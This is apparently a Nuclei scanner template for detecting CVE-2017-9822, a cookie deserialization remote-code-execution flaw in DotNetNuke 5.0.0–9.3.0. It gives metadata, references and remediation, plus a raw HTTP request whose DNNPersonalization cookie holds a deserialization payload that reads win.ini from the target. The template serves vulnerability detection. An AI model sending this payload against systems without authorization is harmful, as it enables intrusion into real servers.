id: CVE-2017-9822 info: name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution author: milo2012 severity: high description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution. impact: | Remote code execution through cookie deserialization remediation: | Upgrade DotNetNuke to a version higher than 9.3.0 reference: - https://github.com/murataydemir/CVE-2017-9822 - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 - http://www.dnnsoftware.com/community/security/security-center - http://packetstormsecurity.com/files/157080/DotNetNuke-Cookie-Deserialization-Remote-Code-Execution.html - https://github.com/xbl3/awesome-cve-poc_qazbnm456 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 epss-score: 0.96984 epss-percentile: 0.99734 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dnnsoftware product: dotnetnuke fofa-query: app="dotnetnuke" tags: cve2017,cve,packetstorm,dotnetnuke,bypass,rce,deserialization,kev,dnnsoftware http: - raw: - | GET /__ HTTP/1.1 Host: {{Hostname}} Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini matchers-condition: and matchers: - type: word part: body words: - '[extensions]' - 'for 16-bit app support' condition: and - type: status status: - 404 # digest: 4b0a004830460221009be35f84b58a3b2534536d4717801b75f2f9cec7a15b7a50ddab4fa986660d9e022100f6a7a8f7f29cd485e81d17ed1b9b3fb1ce3f3be143c79087b917bd4abd3c0a57:922c64590222798bb761d5b6d8e72950